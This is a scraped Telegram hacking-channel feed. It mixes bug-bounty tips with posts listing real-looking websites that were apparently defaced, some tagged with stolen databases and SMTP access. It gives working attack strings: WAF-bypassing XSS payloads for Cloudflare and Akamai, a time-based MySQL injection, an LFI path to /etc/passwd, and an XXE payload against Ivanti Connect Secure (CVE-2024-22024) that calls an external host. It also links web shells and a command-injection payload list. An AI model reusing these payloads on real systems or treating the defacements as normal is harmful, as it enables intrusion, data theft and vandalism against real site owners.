BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡1❤‍🔥1🔥1😢1

788 views14:48

🕸 Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

👁‍🗨

Mirror-h

📊

Database

Country: 🇷🇺

#Deface

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥3👎2⚡1❤1

841 views01:14

Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #bugbountytips #infosec

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡1❤1🔥1

832 views13:14

Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>

Vector PoC

#XSS #Bypass

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡1❤1🔥1

835 views13:45

🐱 SiCat 🐱

The useful exploit finder

💬

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸

Github

⬇️

Download

🔒

BugCod3

#Exploit #Metasploit #Finder

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2❤1👍1🔥1🐳1

896 views14:25

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW

MySQL

#bugbountytip #infosec

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤2👎2⚡1🔥1

912 views14:36

🕸 Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

👁‍🗨

Mirror-h

Country: 🇯🇵

🇺🇸

#Deface

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🐳2

953 views22:52

Free Shell

🔗

Link

#Shell

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤3⚡1🔥1😍1🐳1

933 views13:35

🕸 Site:
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/

👁‍🗨

Mirror-h

📊

Database

🛡

Smtp

📧

LeafMailer

🔒

bugcod3

Country: 🇺🇸

#Deface

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡3🔥2❤1👍1

1.37K viewsedited 21:41

Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2❤1🔥1

900 viewsedited 11:00

Command Injection Payload List

⬇️

Download

#Payload #Command #Injection

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2❤1🔥1

823 views11:14

☠️

xnLinkFinder v4.4 ☠️

💬

A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:

cd xnLinkFinder
sudo python setup.py install

💻 Usage:

python xnLinkFinder.py --help

📂 Examples:

#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com

😸

Github

⬇️

Donwload

🔒

BugCod3

#Python #Discover #Endpoints

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍3⚡2🔥2❤1

904 views12:03

NetProbe: Network Probe

💬

NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:

cd NetProbe
pip install -r requirements.txt

💻 Usage:

python3 netprobe.py —help

📂 Example:

python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

😸

Github

⬇️

Download

🔒

BugCod3

#Python #Network #Scanner #Vulnerability #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡4❤3🔥1

889 views13:14

🕸 Site:
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/

👁‍🗨

Mirror-h

📊

Database (tridentresortsholidays.com)

Country: 🇺🇸

🇮🇹

#Deface

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡3❤2🔥1

1.11K views23:43

🔗

Link

Enjoy... ⭐️

#Shell

➖

🔥

0Day.Today

📣

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡4❤1👍1🔥1

1.24K views07:41

I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘

Twitter

#bugbounty #xss #infosec

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤2🔥2⚡1🤣1

896 views00:34

ALWAYS test 404 Not Found in Bug Bounties!

🔗

Medium

🔗

Freedium

#Writeup

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤5⚡1👍1🔥1

813 views00:44

👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤3🔥2❤‍🔥1⚡1

862 views01:14

CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti

➖

👤

📣